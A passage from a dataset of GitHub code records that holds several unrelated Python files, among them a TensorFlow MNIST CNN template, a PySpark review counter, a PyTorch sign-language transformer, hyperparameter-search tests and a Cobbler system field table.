{self.id} ready')\r\n \r\n # We need to silence all errors on new process\r\n h5py._errors.silence_errors()\r\n self._initialize_thread()\r\n \r\n if not master is None:\r\n print(f'Master thread {self.id} started')\r\n else:\r\n print(f'Thread {self.id} started')\r\n\r\n try:\r\n self.env.reset()\r\n while True:\r\n self._sync_network()\r\n # Plays some samples\r\n playout_reward, results, rollout_path = self._forward_explore()\r\n # Train on collected samples\r\n self._optimize_path(playout_reward, results, rollout_path)\r\n \r\n print(f'Step finished {self.optimizer.get_global_step()}')\r\n\r\n # Trigger save or other\r\n self.saver.after_optimization() \r\n pass\r\n except Exception as e:\r\n print(e)\r\n # TODO: add logging\r\n #self.logger.error(e.msg)\r\n raise e","repo_name":"jkulhanek/visual-navigation-agent-pytorch","sub_path":"agent/training_thread.py","file_name":"training_thread.py","file_ext":"py","file_size_in_byte":8498,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"3"} +{"seq_id":"10241349815","text":"import re, sys, json\n\nfrom cleanQty import qtyCleaner\nfrom cleanIngred import ingredCleaner\n\nfolders = [\"低脂\",\"生酮\",\"低醣\",\"沙拉\",\"高蛋白\",\"健身\",\"高纖\"]\n\ncntTotal = 0\ncntProcs = 0\nfoodList = []\nfoodFreq = {}\n\nnClean = int(sys.argv[1]) if len(sys.argv) > 1 else 4\nbVerb = bool(sys.argv[2]) if len(sys.argv) > 2 else False\n\ndef load_ID(path):\n ID_file = path\n ID_dict = set()\n try:\n with open(ID_file, \"r\", encoding='utf-8') as f:\n for line in f:\n ID_dict.add(line.replace('\\n', ''))\n except:\n print('No excluding list loaded.')\n return ID_dict\n\nignore_IDs = load_ID('ID_exclude.txt')\nskip_IDs = set()\n\niCleaner = ingredCleaner()\nqCleaner = qtyCleaner()\n\ndef procIngrdent(food_ID, ingreds, bVerb=bVerb, nClean=nClean):\n global foodList, foodFreq, cntTotal\n global iCleaner\n\n x = {} # to avoid change ingreds in for-loop\n for food, qty in ingreds.items(): # 抓出\"食譜\"中的所有 key 和 值\n if nClean:\n nfood = iCleaner.clean(food_ID, food, bVerb=bVerb, nClean=nClean)\n qty_unit = qCleaner.clean(food_ID, qty, bVerb=bVerb)\n else:\n qty_unit = qty\n nfood = food\n\n if iCleaner.checkSkip(food_ID, nfood, qty_unit, bVerb=True) > 0:\n skip_IDs.add(food_ID)\n # continue\n\n # 計算食材出現詞頻\n if nfood in foodList:\n foodFreq[nfood] += 1\n else:\n foodFreq[nfood] = 1\n foodList.append(nfood)\n #print(food) # 所有食材\n x[nfood] = qty_unit\n return x\n\nxf1 = open('./clr-Long.txt', 'w', encoding='utf-8')\nxf2 = open('./clr-Short.txt', 'w', encoding='utf-8')\nfor i in folders:\n with open(f'{i}/{i}.txt', 'r', encoding='utf-8') as f:\n for line in f: # 使用迴圈方式一條一條抓\n data = json.loads(line)\n\n cntTotal += 1\n food_ID = data['food_ID']\n if food_ID not in ignore_IDs:\n data['推讚數'] = qCleaner.parseNumber(data['推讚數'])\n data['瀏覽數'] = qCleaner.parseNumber(data['瀏覽數'])\n data['份數'] = qCleaner.parseNumber(data['份數'])\n data['食譜'] = procIngrdent(food_ID, data['食譜'], bVerb=bVerb, nClean=nClean)\n cntProcs += 1\n xf1.write(json.dumps(data, ensure_ascii=False)+'\\n')\n xf2.write(json.dumps({'id':food_ID, 'ingredents':data['食譜']}, ensure_ascii=False)+'\\n')\nxf1.close()\nxf2.close()\n\nskipA, skipB, skipC = iCleaner.getSkip()\nprint(f\"少許:{len(skipA)}\\nList:{skipA}\\n\\n適量:{len(skipB)}\\nList:{skipB}\\n\\n空白:{len(skipC)}\\nList:{skipC}\\n\")\nprint(f'To Skip:{len(skip_IDs)}\\nList:{skip_IDs}')\n\nprint(len(foodList)) # 總共多少食材\nprint(cntTotal, cntProcs) # 總共幾個食譜\n\n\n# 詞頻轉成表格\nimport pandas as pd\ndf = pd.DataFrame.from_dict(foodFreq, orient='index', columns=['詞頻']) # 將字典轉為表格\n\n# df = df.sort_index(ascending=False)\n# df.to_csv(\"照食材順序排的food_frequency_2.0.csv\", encoding=\"utf-8-sig\")\n\ndf = df.sort_values(by='詞頻', ascending=False) # 照\"詞頻\"這欄的值,由大到小做排列 ascending=False\ndf.to_csv(\"照詞頻順序排的food_frequency_2.0.csv\", encoding=\"utf-8-sig\")\n","repo_name":"peter81725/Food-Fighter","sub_path":"recipeETL/Crawler/wordCount.py","file_name":"wordCount.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6728260922","text":"\"\"\" Using convolutional net on MNIST dataset of handwritten digit\n(http://yann.lecun.com/exdb/mnist/)\n\"\"\"\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport time\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport utils\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\nN_CLASSES = 10\n\n# Step 1: Read in data\n# using TF Learn's built in function to load MNIST data to the folder data/mnist\nmnist = input_data.read_data_sets(\"datasets/mnist\", one_hot=True)\n\n# Step 2: Define paramaters for the model\nLEARNING_RATE = 0.001\nBATCH_SIZE = 128\nSKIP_STEP = 10\nDROPOUT = 0.75\nN_EPOCHS = 5\n\n# Step 3: create placeholders for features and labels\n# each image in the MNIST data is of shape 28*28 = 784\n# therefore, each image is represented with a 1x784 tensor\n# We'll be doing dropout for hidden layer so we'll need a placeholder\n# for the dropout probability too\n# Use None for shape so we can change the batch_size once we've built the graph\nwith tf.name_scope('Data'):\n X = tf.placeholder(tf.float32, [None, 784], name=\"X_placeholder\")\n Y = tf.placeholder(tf.float32, [None, 10], name=\"Y_placeholder\")\n\ndropout = tf.placeholder(tf.float32, name='dropout')\nglobal_step = tf.Variable(0, dtype=tf.int32, trainable=False, name='global_step')\n\n# Step 4 + 5: create weights + do inference\n# the model is conv -> relu -> pool -> conv -> relu -> pool -> fully connected -> softmax\n\nutils.make_dir('checkpoints')\nutils.make_dir('checkpoints/CNN')\n\nwith tf.variable_scope('conv1') as scope:\n # first, reshape the image to [BATCH_SIZE, 28, 28, 1] to make it work with tf.nn.conv2d\n # use the dynamic dimension -1\n images = tf.reshape(X, shape=[-1, 28, 28, 1])\n\n # TO DO\n\n # create kernel variable of dimension [5, 5, 1, 32]\n # use tf.truncated_normal_initializer()\n kernel = tf.get_variable('kernel', [5, 5, 1, 32],\n initializer=tf.truncated_normal_initializer())\n\n # TO DO\n\n # create biases variable of dimension [32]\n # use tf.constant_initializer(0.0)\n biases = tf.get_variable('biases', [32],\n initializer=tf.random_normal_initializer())\n\n # TO DO\n\n # apply tf.nn.conv2d. strides [1, 1, 1, 1], padding is 'SAME'\n conv = tf.nn.conv2d(images, kernel, strides=[1, 1, 1, 1], padding='SAME')\n\n # TO DO\n\n # apply relu on the sum of convolution output and biases\n conv1 = tf.nn.relu(conv + biases, name=scope.name)\n\n # output is of dimension BATCH_SIZE x 28 x 28 x 32\n\nwith tf.variable_scope('pool1') as scope:\n # apply max pool with ksize [1, 2, 2, 1], and strides [1, 2, 2, 1], padding 'SAME'\n pool1 = tf.nn.max_pool(conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],\n padding='SAME')\n # TO DO\n\n # output is of dimension BATCH_SIZE x 14 x 14 x 32\n\nwith tf.variable_scope('conv2') as scope:\n # similar to conv1, except kernel now is of the size 5 x 5 x 32 x 64\n kernel = tf.get_variable('kernels', [5, 5, 32, 64],\n initializer=tf.truncated_normal_initializer())\n biases = tf.get_variable('biases', [64],\n initializer=tf.random_normal_initializer())\n conv = tf.nn.conv2d(pool1, kernel, strides=[1, 1, 1, 1], padding='SAME')\n conv2 = tf.nn.relu(conv + biases, name=scope.name)\n\n # output is of dimension BATCH_SIZE x 14 x 14 x 64\n\nwith tf.variable_scope('pool2') as scope:\n # similar to pool1\n pool2 = tf.nn.max_pool(conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],\n padding='SAME')\n\n # output is of dimension BATCH_SIZE x 7 x 7 x 64\n\nwith tf.variable_scope('fc') as scope:\n # use weight of dimension 7 * 7 * 64 x 1024\n input_features = 7 * 7 * 64\n\n # create weights and biases\n\n # TO DO\n w = tf.get_variable('weights', [input_features, 1024],\n initializer=tf.truncated_normal_initializer())\n b = tf.get_variable('biases', [1024],\n initializer=tf.constant_initializer(0.0))\n\n # reshape pool2 to 2 dimensional\n pool2 = tf.reshape(pool2, [-1, input_features])\n\n # apply relu on matmul of pool2 and w + b\n fc = tf.nn.relu(tf.matmul(pool2, w) + b, name='relu')\n\n # TO DO\n\n # apply dropout\n fc = tf.nn.dropout(fc, dropout, name='relu_dropout')\n\nwith tf.variable_scope('softmax_linear') as scope:\n # this you should know. get logits without softmax\n # you need to create weights and biases\n\n # TO DO\n w = tf.get_variable('weights', [1024, N_CLASSES],\n initializer=tf.truncated_normal_initializer())\n b = tf.get_variable('biases', [N_CLASSES],\n initializer=tf.random_normal_initializer())\n logits = tf.matmul(fc, w) + b\n\n# Step 6: define loss function\n# use softmax cross entropy with logits as the loss function\n# compute mean cross entropy, softmax is applied internally\nwith tf.name_scope('Loss'):\n # you should know how to do this too\n\n # TO DO\n entropy = tf.nn.softmax_cross_entropy_with_logits_v2(labels=Y, logits=logits)\n loss = tf.reduce_mean(entropy, name='loss')\n\n# Step 7: define training op\n# using gradient descent with learning rate of LEARNING_RATE to minimize cost\n# don't forgot to pass in global_step\n\n# TO DO\nwith tf.name_scope('Optimizer'):\n optimizer = tf.train.AdamOptimizer(LEARNING_RATE).minimize(loss, global_step=global_step)\n\n# evaluation the model\nwith tf.name_scope(\"Evaluation\"):\n preds = tf.nn.softmax(logits)\n correct_preds = tf.equal(tf.argmax(preds, 1), tf.argmax(Y, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_preds, tf.float32))\n\n# Create a summary to monitor loss\ntf.summary.scalar(\"accuracy\", accuracy)\ntf.summary.scalar(\"loss\", loss)\n\n# merge summaries per collection\ntraining_summary = tf.summary.merge_all()\n\nwith tf.Session() as sess:\n writer_train = tf.summary.FileWriter('./graphs/CNN', sess.graph)\n\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver()\n # You have to create folders to store checkpoints\n ckpt = tf.train.get_checkpoint_state(os.path.dirname('checkpoints/CNN/'))\n # if that checkpoint exists, restore from checkpoint\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n\n initial_step = global_step.eval()\n\n start_time = time.time()\n n_batches = int(mnist.train.num_examples / BATCH_SIZE)\n\n total_loss = 0.0\n for index in range(initial_step, n_batches * N_EPOCHS): # train the model n_epochs times\n X_batch, Y_batch = mnist.train.next_batch(BATCH_SIZE)\n _, loss_batch, train_summ = sess.run([optimizer, loss, training_summary],\n feed_dict={X: X_batch, Y: Y_batch, dropout: DROPOUT})\n writer_train.add_summary(train_summ, index)\n total_loss += loss_batch\n if (index + 1) % SKIP_STEP == 0:\n print('Average loss at step {}: {}'.format(index + 1, total_loss / SKIP_STEP))\n total_loss = 0.0\n saver.save(sess, 'checkpoints/CNN/', index + 1)\n\n print(\"Optimization Finished!\") # should be around 0.35 after 25 epochs\n print(\"Total time: {0} seconds\".format(time.time() - start_time))\n\n # Test model calculate accuracy\n print('Accuracy on test data:', accuracy.eval(\n {X: mnist.test.images, Y: mnist.test.labels, dropout: 1.0}))\n print('Run the command line: tensorboard --logdir=./graphs/CNN')\n","repo_name":"st2yang/5525MachineLearning","sub_path":"HW3/code/ConvNetTemplate.py","file_name":"ConvNetTemplate.py","file_ext":"py","file_size_in_byte":7494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3852796189","text":"#!/usr/bin/python3\n\"\"\" Rectangle Class Module \"\"\"\nfrom models.base import Base\n\n\nclass Rectangle(Base):\n \"\"\" Rectangle Class, Subclass of Class Base \"\"\"\n\n def __init__(self, width, height, x=0, y=0, id=None):\n \"\"\" Initializes a rectangle with size attributes \"\"\"\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n super().__init__(id)\n\n @property\n def width(self):\n \"\"\" Returns width of rectangle \"\"\"\n return self.__width\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width of rectangle \"\"\"\n if not type(value) == int:\n raise TypeError(\"width must be an integer\")\n elif value <= 0:\n raise ValueError(\"width must be > 0\")\n else:\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Returns height of rectangle \"\"\"\n return self.__height\n\n @height.setter\n def height(self, value):\n \"\"\" Sets height of rectangle \"\"\"\n if not type(value) == int:\n raise TypeError(\"height must be an integer\")\n elif value <= 0:\n raise ValueError(\"height must be > 0\")\n else:\n self.__height = value\n\n @property\n def x(self):\n \"\"\" Returns x \"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\" Sets x \"\"\"\n if not type(value) == int:\n raise TypeError(\"x must be an integer\")\n elif value < 0:\n raise ValueError(\"x must be >= 0\")\n else:\n self.__x = value\n\n @property\n def y(self):\n \"\"\" Returns y \"\"\"\n return self.__y\n\n @y.setter\n def y(self, value):\n \"\"\" Sets y \"\"\"\n if not type(value) == int:\n raise TypeError(\"y must be an integer\")\n elif value < 0:\n raise ValueError(\"y must be >= 0\")\n else:\n self.__y = value\n\n def area(self):\n \"\"\" Returns area of rectangle \"\"\"\n return self.__width * self.__height\n\n def display(self):\n \"\"\" Prints the rectangle to stdout using # \"\"\"\n for i in range(self.__y):\n print(\"\")\n for i in range(self.__height):\n print(\" \" * self.__x + \"#\" * self.__width)\n\n def __str__(self):\n \"\"\" Returns a string representation of the Rectangle class \"\"\"\n return \"[{}] ({}) {}/{} - {}/{}\".format(type(self).__name__, self.id,\n self.__x, self.__y,\n self.__width, self.__height)\n\n def update(self, *args, **kwargs):\n \"\"\" Assigns an argument to each attribute \"\"\"\n if args and len(args) != 0:\n for i, arg in enumerate(args):\n if i == 0:\n self.id = arg\n if i == 1:\n self.width = arg\n if i == 2:\n self.height = arg\n if i == 3:\n self.x = arg\n if i == 4:\n self.y = arg\n else:\n if kwargs:\n for key, arg in kwargs.items():\n if key == \"id\":\n self.id = arg\n if key == \"width\":\n self.width = arg\n if key == \"height\":\n self.height = arg\n if key == \"x\":\n self.x = arg\n if key == \"y\":\n self.y = arg\n\n def to_dictionary(self):\n \"\"\" Returns a dictionary representation of the Rectangle Class \"\"\"\n class_dict = {'id': self.id, 'width': self.width,\n 'height': self.height, 'x': self.x, 'y': self.y}\n return class_dict\n","repo_name":"Mre-Dennis-Kinuthia/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":3774,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"15470274127","text":"'''from pyspark import SparkContext\nimport sys\n\n#filename=sys.argv[1]\ndef main():\n\tsc=SparkContext(appName='SparkWordCount')\n\tinput_file=sc.textFile('/home/parth/Desktop/Hadoop_Files_py/Musical_instruments_reviews.csv')\n\trecords = input_file.map(parserecord).filter(lambda rec:(rec[1]=='5'))\n\tmapvalues = records.map(lambda rec:((rec[0]),1))\n\treduceout = mapvalues.reduceByKey(lambda a,b: a+b)\n\treduceout.saveAsTextFile('/home/parth/Desktop/spark3.txt')\t\n\tsc.stop()\n\ndef parserecord(line):\n\tfields = line.split(\",\")\n\tr_id = (fields[0])\n\treview = (fields[6])\n\treturn(r_id,review)\n\nif __name__=='__main__':\n\tmain()'''\nfrom pyspark import SparkContext\nimport sys\n\ndef main():\n\tsc = SparkContext(appName='SparkWordCount')\n\tinput_file = sc.textFile('/home/parth/Desktop/Hadoop_Files_py/Musical_instruments_reviews.csv')\n\tcounts = input_file.map(lambda line:line.split(',')[0]).map(lambda word:(word,1)).reduceByKey(lambda a,b:a+b)\n\tdef rating(x):\n\t\tl = []\n\t\tif x[1]==5:\n\t\t\tl.append((x[0],x[1]))\n\t\t\treturn l\n\t\telse:\n\t\t\treturn []\n\tcounts = counts.flatMap(lambda x : rating(x))\n\tcounts.saveAsTextFile('/home/parth/Desktop/output2')\n\tsc.stop()\n\nif __name__ == '__main__':\n\tmain()\n\n\n\n#min ax_value = df.agg({\"any-column\": \"max\"}).collect()[0][0]\n#val dsTemp = ds.filter(d => d.temp > 25).map(d => (d.temp, d.device_name, d.cca3)","repo_name":"Parth-Choksi/Demo","sub_path":"sparkprgm/reviewmax5.py","file_name":"reviewmax5.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23130382590","text":"import os\nimport threading\nfrom time import sleep\nfrom threading import Timer\nfrom libs.honorbank import HonorBank\n\nfrom plugin import Plugin\n\n\ndef load(data_dir, bot):\n return Payday(data_dir, bot)\n\n\n\"\"\"\nCreated by Matthew Klawitter 2/1/2018\nLast Updated: 2/1/2018\nVersion: v1.0.0.1\n\"\"\"\n\n\nclass Payday(Plugin):\n def __init__(self, data_dir, bot):\n self.account_manager = HonorBank()\n self.honor_accounts = self.account_manager.honor_accounts\n thread = threading.Thread(target = self.pay_day)\n thread.daemon = True\n thread.start()\n\n def pay_day(self):\n while threading.main_thread().is_alive():\n if self.honor_accounts:\n for account in self.honor_accounts.keys():\n self.account_manager.pay(account, 50)\n self.account_manager.save_accounts()\n sleep(3600)\n","repo_name":"Matthew-Klawitter/Telegram-Response-Bot-KPlugins","sub_path":"plugins/payday.py","file_name":"payday.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"74760566481","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 12 16:07:06 2019\n\n@author: ZHANG Mofan\n\"\"\"\nimport numpy as np\n\ndef meteopreprocessing(data, street_corr):\n data_new = data.copy() \n n_street_added = 0\n for i in range(data.shape[1]):\n for j in range(len(street_corr[i]) - 1):\n data_new = np.insert(data_new, i + 1 + n_street_added, data[:, i], axis = 1)\n n_street_added += 1\n return data_new\n\ndef read_meteo(file_name, shape):\n length = 1\n for l in shape:\n length *= l\n data = np.fromfile(file_name, 'f', length)\n data.shape = shape\n data = data.astype('d')\n return data","repo_name":"BASARANOMO/Tool_meteo_preprocessing","sub_path":"meteopre.py","file_name":"meteopre.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71786166800","text":"import torch\nimport torch.nn as nn\nfrom .decoder import TransformerDecoder\nfrom .encoder import TransformerEncoder\nfrom .embedding import LandmarkEmbedding, TokenEmbedding\n\nclass Transformer(nn.Module):\n def __init__(\n self,\n num_hid=980,\n num_head=2,\n num_feed_forward=128,\n source_maxlen=100,\n target_maxlen=100,\n num_layers_enc=4,\n num_layers_dec=1,\n num_classes=59,\n device=None,\n learning_rate=0.001\n ):\n super(Transformer, self).__init__()\n self.device = device\n self.target_maxlen = target_maxlen\n self.num_classes = num_classes\n self.num_classes = num_classes\n self.source_emb = LandmarkEmbedding(num_hid, source_maxlen, self.device)\n self.target_emb = TokenEmbedding(num_classes, target_maxlen, num_hid, self.device)\n self.transformer_encoders = nn.ModuleList([\n TransformerEncoder(num_hid, num_head, num_feed_forward, self.device)\n for _ in range(num_layers_enc)\n ])\n self.transformer_decoders = nn.ModuleList([\n TransformerDecoder(num_hid, num_head, num_feed_forward, self.device)\n for _ in range(num_layers_dec)\n ])\n self.classifier = nn.Linear(num_hid, num_classes)\n self.loss_metric = nn.CrossEntropyLoss() \n self.optimizer = torch.optim.Adam(self.parameters(), lr=learning_rate)\n self.optimizer = torch.optim.Adam(self.parameters(), lr=learning_rate)\n\n def encoder(self, source, mask_source=None):\n enc_out = self.source_emb(source)\n for encoder in self.transformer_encoders:\n enc_out = encoder(enc_out, mask_source=mask_source)\n return enc_out\n\n def decoder(self, enc_out, target, mask_target=None):\n dec_out = self.target_emb(target)\n for decoder in self.transformer_decoders:\n dec_out = decoder(enc_out, dec_out, mask_target=mask_target)\n return dec_out\n\n def forward(self, source, target, mask_source=None, mask_target=None):\n enc_out = self.encoder(source, mask_source=mask_source)\n dec_out = self.decoder(enc_out, target, mask_target=mask_target)\n return self.classifier(dec_out)\n\n def training_step(self, batch):\n \"\"\"Processes one batch inside model.fit().\"\"\"\n landmark_input, phrase_input = batch \n landmark, landmark_mask = landmark_input['inputs_embeds'], landmark_input[\"attention_mask\"]\n phrase, phrase_mask = phrase_input[\"target\"], [\"target_mask\"]\n dec_input = phrase[:, :-1]\n dec_target = phrase[:, 1:]\n preds = self(landmark, dec_input, mask_source=None, mask_target=None)\n mask = dec_target != 0\n loss = self.loss_metric(preds.permute(0, 2, 1), dec_target)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n return {\"loss\": loss.item()}\n\n def validation_step(self, batch):\n landmark_input, phrase_input = batch \n landmark, landmark_mask = landmark_input['inputs_embeds'], landmark_input[\"attention_mask\"]\n phrase, phrase_mask = phrase_input[\"target\"], [\"target_mask\"]\n\n dec_input = phrase[:, :-1]\n dec_target = phrase[:, 1:]\n preds = self(landmark, dec_input, mask_source=None, mask_target=None)\n mask = dec_target != 0\n loss = self.loss_metric(preds.permute(0, 2, 1), dec_target)\n return {\"loss\": loss.item()}\n\n def inference(self, landmarks, start_token_idx=2):\n enc_out = self.encoder(landmarks)\n bs = landmarks.shape[0] # batch size\n dec_input = torch.ones((bs, 1), dtype=torch.int32, device=self.device) * start_token_idx\n dec_logits = []\n for i in range(self.target_maxlen - 1): # because we already have 1st element\n dec_out = self.decoder(enc_out, dec_input)\n logits = self.classifier(dec_out)\n logits = torch.argmax(logits, dim=1)\n last_logit = logits[:, -1][:, None]\n dec_logits.append(last_logit)\n dec_input = torch.cat([dec_input, last_logit], dim=-1)\n return dec_input\n","repo_name":"hnm942/torch_asl","sub_path":"models/transformer/als_transformer.py","file_name":"als_transformer.py","file_ext":"py","file_size_in_byte":4132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17010640750","text":"from pathlib import Path\nfrom tempfile import TemporaryDirectory\nimport unittest\n\nfrom sklearn.model_selection import KFold\nfrom skopt.space import Categorical, Integer, Real\nimport numpy as np\n\nfrom tests.anomalearn.algorithms.tuning.hyperparameter.stubs.SkoptSearchABCChild import \\\n SkoptSearchABCChild\nfrom tests.anomalearn.algorithms.tuning.hyperparameter.TestHyperparameterSearch import \\\n RandomScoreHolder\n\n\nclass TestSkoptSearchABC(unittest.TestCase):\n @classmethod\n def setUpClass(cls) -> None:\n rng = np.random.default_rng()\n cls.series = rng.random((1000, 5), dtype=np.double)\n cls.labels = rng.integers(0, 1, 1000, dtype=np.intc, endpoint=True)\n cls.rng = rng\n \n def test_search_and_get_results(self):\n with TemporaryDirectory() as tmp_dir:\n scorer = RandomScoreHolder(np.random.default_rng(100), self.series, self.labels, KFold())\n fake_values = [[0, 0, 0], [1, 0, 0], [0, 10, 0], [0.5, 0, 0]]\n \n space = [Integer(0, 100), Categorical([0, 10, 20, 30]), Real(0, 100)]\n tuner = SkoptSearchABCChild(space, Path(tmp_dir), \"test\", fake_values=fake_values)\n \n # tests are inside the stub because it should test that the\n # skopt call is called with the right arguments both in case of\n # loading a previous history and in case of creating a new one\n result = tuner.search(self.series, self.labels, scorer.random_score, skopt_kwargs={\"test\": \"value\", \"tester\": self})\n \n self.assertTrue((Path(tmp_dir) / \"test.pkl\"))\n y0 = [e[0] for e in result.get_history()[1:]]\n\n scorer = RandomScoreHolder(np.random.default_rng(100), self.series, self.labels, KFold())\n tuner = SkoptSearchABCChild(space, Path(tmp_dir), \"test\", fake_values=fake_values, test_loading=True, previous_y=y0)\n _ = tuner.search(self.series, self.labels, scorer.random_score, load_checkpoints=True, skopt_kwargs={\"test\": \"value\", \"tester\": self})\n","repo_name":"marcopetri98/anomalearn","sub_path":"tests/anomalearn/algorithms/tuning/hyperparameter/TestSkoptSearchABC.py","file_name":"TestSkoptSearchABC.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"36438331766","text":"import string\n\ndef un_mix(oneLetter,num):\n\n if(oneLetter.isupper()):\n word = ord(oneLetter)-MIN_CAPLETTER\n shift = ord(num)-MIN_CAPLETTER\n return upperFlag[(word - shift)%len(upperFlag)]\n if(oneLetter.islower()):\n word = ord(oneLetter)-MIN_LETTER\n shift = ord(num)-MIN_LETTER\n return lowerFlag[(word - shift)%len(upperFlag)]\n\n\np = \"ZBTZBHZBIZBSBSEzcawBSEzyzuawac\"\ni = 0\n\nupperFlag = string.ascii_uppercase[:26]\nlowerFlag = string.ascii_lowercase[:26]\nMIN_LETTER = ord(\"a\")\nMIN_CAPLETTER = ord(\"A\")\n\nnumShift = \"t\"\nun_mixed = \"\"\n\nfor count, alpha in enumerate(p):\n un_mixed += un_mix(alpha, numShift)\n\n\nc=\"ACUACIACJACT_gjhd_gfgbhdhj\"\nprint(c)\ni=0\nwhile(i>\", 0, \"Automatic Installation Template\", True, \"Path to automatic installation template\", 0, \"str\"],\n [\"autoinstall_meta\", {}, 0, \"Automatic Installation Template Metadata\", True, \"Ex: dog=fang agent=86\", 0, \"dict\"],\n [\"boot_files\", {}, '<>', \"TFTP Boot Files\", True, \"Files copied into tftpboot beyond the kernel/initrd\", 0, \"list\"],\n [\"boot_loader\", \"<>\", 0, \"Boot loader\", True, \"Linux installation boot loader\", utils.get_supported_system_boot_loaders(), \"str\"],\n [\"comment\", \"\", 0, \"Comment\", True, \"Free form text description\", 0, \"str\"],\n [\"enable_gpxe\", \"<>\", 0, \"Enable gPXE?\", True, \"Use gPXE instead of PXELINUX for advanced booting options\", 0, \"bool\"],\n [\"fetchable_files\", {}, '<>', \"Fetchable Files\", True, \"Templates for tftp or wget/curl\", 0, \"dict\"],\n [\"gateway\", \"\", 0, \"Gateway\", True, \"\", 0, \"str\"],\n [\"hostname\", \"\", 0, \"Hostname\", True, \"\", 0, \"str\"],\n [\"image\", None, 0, \"Image\", True, \"Parent image (if not a profile)\", 0, \"str\"],\n [\"ipv6_default_device\", \"\", 0, \"IPv6 Default Device\", True, \"\", 0, \"str\"],\n [\"kernel_options\", {}, 0, \"Kernel Options\", True, \"Ex: selinux=permissive\", 0, \"dict\"],\n [\"kernel_options_post\", {}, 0, \"Kernel Options (Post Install)\", True, \"Ex: clocksource=pit noapic\", 0, \"dict\"],\n [\"mgmt_classes\", \"<>\", 0, \"Management Classes\", True, \"For external config management\", 0, \"list\"],\n [\"mgmt_parameters\", \"<>\", 0, \"Management Parameters\", True, \"Parameters which will be handed to your management application (Must be valid YAML dictionary)\", 0, \"str\"],\n [\"name\", \"\", 0, \"Name\", True, \"Ex: vanhalen.example.org\", 0, \"str\"],\n [\"name_servers\", [], 0, \"Name Servers\", True, \"space delimited\", 0, \"list\"],\n [\"name_servers_search\", [], 0, \"Name Servers Search Path\", True, \"space delimited\", 0, \"list\"],\n [\"netboot_enabled\", True, 0, \"Netboot Enabled\", True, \"PXE (re)install this machine at next boot?\", 0, \"bool\"],\n [\"next_server\", \"<>\", 0, \"Next Server Override\", True, \"See manpage or leave blank\", 0, \"str\"],\n [\"owners\", \"<>\", 0, \"Owners\", True, \"Owners list for authz_ownership (space delimited)\", 0, \"list\"],\n [\"power_address\", \"\", 0, \"Power Management Address\", True, \"Ex: power-device.example.org\", 0, \"str\"],\n [\"power_id\", \"\", 0, \"Power Management ID\", True, \"Usually a plug number or blade name, if power type requires it\", 0, \"str\"],\n [\"power_pass\", \"\", 0, \"Power Management Password\", True, \"\", 0, \"str\"],\n [\"power_type\", \"SETTINGS:power_management_default_type\", 0, \"Power Management Type\", True, \"Power management script to use\", power_manager.get_power_types(), \"str\"],\n [\"power_user\", \"\", 0, \"Power Management Username\", True, \"\", 0, \"str\"],\n [\"profile\", None, 0, \"Profile\", True, \"Parent profile\", [], \"str\"],\n [\"proxy\", \"<>\", 0, \"Internal Proxy\", True, \"Internal proxy URL\", 0, \"str\"],\n [\"server\", \"<>\", 0, \"Server Override\", True, \"See manpage or leave blank\", 0, \"str\"],\n [\"status\", \"production\", 0, \"Status\", True, \"System status\", [\"\", \"development\", \"testing\", \"acceptance\", \"production\"], \"str\"],\n [\"template_files\", {}, 0, \"Template Files\", True, \"File mappings for built-in configuration management\", 0, \"dict\"],\n [\"virt_auto_boot\", \"<>\", 0, \"Virt Auto Boot\", True, \"Auto boot this VM?\", 0, \"bool\"],\n [\"virt_cpus\", \"<>\", 0, \"Virt CPUs\", True, \"\", 0, \"int\"],\n [\"virt_disk_driver\", \"<>\", 0, \"Virt Disk Driver Type\", True, \"The on-disk format for the virtualization disk\", validate.VIRT_DISK_DRIVERS, \"str\"],\n [\"virt_file_size\", \"<>\", 0, \"Virt File Size(GB)\", True, \"\", 0, \"float\"],\n [\"virt_path\", \"<>\", 0, \"Virt Path\", True, \"Ex: /directory or VolGroup00\", 0, \"str\"],\n [\"virt_pxe_boot\", 0, 0, \"Virt PXE Boot\", True, \"Use PXE to build this VM?\", 0, \"bool\"],\n [\"virt_ram\", \"<>\", 0, \"Virt RAM (MB)\", True, \"\", 0, \"int\"],\n [\"virt_type\", \"<>\", 0, \"Virt Type\", True, \"Virtualization technology to use\", validate.VIRT_TYPES, \"str\"],\n [\"serial_device\", \"\", 0, \"Serial Device #\", True, \"Serial Device Number\", 0, \"int\"],\n [\"serial_baud_rate\", \"\", 0, \"Serial Baud Rate\", 